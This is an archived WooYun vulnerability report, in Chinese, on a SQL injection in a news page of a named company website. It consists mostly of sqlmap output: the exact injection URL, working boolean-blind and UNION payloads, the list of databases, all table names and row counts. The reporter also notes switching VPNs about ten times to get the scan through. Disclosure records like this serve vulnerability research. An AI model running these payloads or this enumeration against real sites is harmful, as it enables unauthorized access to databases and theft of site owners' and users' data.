乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开
- -vpn切换了10来个才跑出来
注入点
http://www.vogel.com.cn/news_view.html?id=484063
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=484063' AND 1623=1623 AND 'RADm'='RADm Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: id=-6617' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787a71,0x67735458746567707a61,0x717a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL 5available databases [6]:[*] corpdb19[*] globaldb19[*] gsessiondb[*] information_schema[*] mysql[*] performance_schemasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=484063' AND 1623=1623 AND 'RADm'='RADm Type: UNION query Title: MySQL UNION query (NULL) - 19 columns Payload: id=-6617' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178787a71,0x67735458746567707a61,0x717a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL 5Database: globaldb19[212 tables]+-------------------------+| option || active_record || active_users || activeusernum || answer || askpriv || bas_dictionary || bas_dictionary_type || category || channelregstathour || clsiddef || common_survey || common_survey_answer || commonuserhour || connect_group || connect_personal || dede_arctype || dede_channeltype || dede_co_htmls || dede_co_mediaurls || dede_co_note || dede_co_onepage || dede_co_urls || distinctipcount || enews_industry || enews_unsubscribe || enewscont || enewsletter || expert_bulletin || expert_extinfo || expert_suggestion || expertuserhour || find_passwd || group_contact || group_gbook || group_info || group_picture || group_reply_tips || group_sport_join || group_sport_reply_tips || group_sport_tips || group_title_tips || group_user || groupstathour || ju2_gym || keywords || keywords_kind || lastinfo || leaveword || lowsql || m_meeting || m_meeting_apply || mediafiles || monitorsync || netquestion || news_column || newuserregstat || nomarl_date || pageregstathour || ploy_hnw || ploy_record || ploy_topics || ploy_topics_put || pregnancy_care || pregnant_meal || prescription || private_dish || process_result || pulmonary_record || question || questionnaire || refersitestat || regchannel || sph_counter || subhealth_record || subhealth_symptom || suliao_news || suliao_v_news || suliao_v_paper || survey || survey_record || symptom || t_addelivey || t_adlog || t_adlog_20140924 || t_adminlog || t_adpos || t_adpub || t_adpubtmp || t_adtarget || t_aduser || t_aduser_auto || t_advert || t_coldatas || t_coldatas_bak || t_coldatasversion || t_columns || t_columns_bak || t_columnsversion || t_directory || t_expcont || t_expert_ask || t_expnews || t_groupdataclass || t_grouppage || t_grouppaperclass || t_groupproductclass || t_groupskin || t_grouptpl || t_groupuserset || t_gtarea || t_gtuser || t_gtuser_invite || t_gtuser_invitecode || t_gtuser_invitemail || t_gtuser_inviteprocess || t_gtuser_inviteshiyou || t_gtuser_invitevogelxue || t_gtuser_tmp || t_industrycls || t_magazine_info || t_magazine_journal || t_magazinecls || t_newscont || t_newscont_extend || t_newscont_stat || t_newscontaudit || t_newsletter || t_newsletter_record || t_newsletter_send || t_newslove_ip || t_oemcls || t_pagecls || t_pagecolumns || t_pages || t_pagesversion || t_prodcls || t_pubcont || t_pubconthist || t_pubconttmp || t_pubcontversion || t_pushflag || t_record || t_record_blog || t_record_info || t_record_info_extend || t_record_info_stat || t_record_learn || t_record_papers || t_record_papers_extend || t_record_papers_stat || t_record_space || t_record_wiki || t_review || t_skin || t_stats || t_subscribe || t_survey || t_surveyoption || t_surveyprocessresult || t_surveyquestionnaire || t_surveyrecord || t_sysfuncs || t_sysroles || t_sysusers || t_topicscate || t_topicscls || t_topicsclstmp || t_topicscolumn || t_topicsinfo || t_usercls || ta_page_urlmap || tarea || tb_recode_health || td_activeuserid || td_adlog_stat || td_blogviewtimes || td_corp_logstat || td_urlhop_stat || tips || tipsindex || tmpuser || topic_comments || topic_info || topic_reg || urlmap || user_active_key || user_industry || user_infos || user_magazine_info || user_public || user_rss || user_ui_relation || usergroupstat || userregstat || usersub_url || video_info || video_info_extend || video_info_stat || video_letv || visit_counter || visit_log || visit_log_002 || visit_log_admin || visit_log_topics || vote_item || vote_log || vote_other || vote_topic || wx_photo || wx_photo1 || z_test |+-------------------------+Database: globaldb19+-------------------------+---------+| Table | Entries |+-------------------------+---------+| visit_log_topics | 1744920 || t_adlog_20140924 | 518178 || t_adlog | 280832 || t_newscont | 279539 || t_newscont_extend | 272074 || dede_co_urls | 254695 || visit_log | 222462 || t_adminlog | 160437 || t_newscontaudit | 138624 || user_industry | 97493 || dede_co_htmls | 93185 || t_pushflag | 87471 || t_gtuser | 83040 || ploy_topics | 53971 || visit_counter | 47695 || t_record_info | 47373 || t_record_info_extend | 42181 || t_pubconthist | 37578 || t_stats | 28538 || t_pubcont | 22471 || t_pubconttmp | 21896 || t_columns | 11018 || t_coldatas | 10991 || t_surveyprocessresult | 10388 || user_active_key | 7982 || video_info | 5853 || video_info_extend | 4775 || t_record_papers | 4511 || t_industrycls | 4491 || video_letv | 4419 || t_adpubtmp | 4399 || t_gtuser_invitemail | 4371 || t_adpub | 4362 || enewscont | 4251 || t_record_papers_extend | 3962 || t_surveyoption | 3894 || suliao_news | 3871 || t_adpos | 3786 || t_pages | 3487 || t_record_blog | 3206 || suliao_v_news | 3064 || lastinfo | 2831 || user_magazine_info | 2675 || t_addelivey | 2473 || t_record | 2366 || keywords | 2157 || user_public | 2113 || t_topicscolumn | 2102 || tmpuser | 1961 || category | 1786 || t_advert | 1776 || t_magazine_info | 1267 || t_review | 1096 || ploy_record | 1000 || t_surveyrecord | 955 || wx_photo | 941 || wx_photo1 | 941 || t_gtuser_invitecode | 817 || suliao_v_paper | 806 || t_surveyquestionnaire | 789 || enewsletter | 788 || enews_industry | 784 || topic_reg | 784 || m_meeting_apply | 744 || tips | 671 || dede_co_note | 657 || t_topicscate | 580 || t_gtuser_inviteprocess | 532 || bas_dictionary | 473 || group_info | 448 || vote_item | 394 || t_newslove_ip | 384 || t_topicsinfo | 367 || t_gtuser_invite | 326 || t_directory | 310 || ploy_topics_put | 241 || t_usercls | 233 || t_aduser | 207 || t_sysusers | 199 || group_picture | 162 || visit_log_002 | 127 || t_gtuser_inviteshiyou | 114 || z_test | 114 || t_magazine_journal | 102 || enews_unsubscribe | 100 || t_sysfuncs | 96 || expert_bulletin | 82 || t_subscribe | 76 || t_survey | 76 || bas_dictionary_type | 65 || find_passwd | 58 || t_magazinecls | 57 || topic_info | 55 || t_gtuser_invitevogelxue | 49 || t_pagecls | 48 || group_user | 47 || keywords_kind | 42 || t_topicsclstmp | 22 || t_sysroles | 16 || t_grouppage | 14 || vote_topic | 12 || group_gbook | 10 || vote_log | 10 || m_meeting | 8 || t_groupproductclass | 8 || dede_channeltype | 6 || topic_comments | 6 || sph_counter | 5 || t_gtuser_tmp | 5 || t_topicscls | 5 || lowsql | 3 || t_grouppaperclass | 2 || news_column | 1 || ploy_hnw | 1 || t_groupskin | 1 || t_grouptpl | 1 |+-------------------------+---------+
- -
未能联系到厂商或者厂商积极拒绝
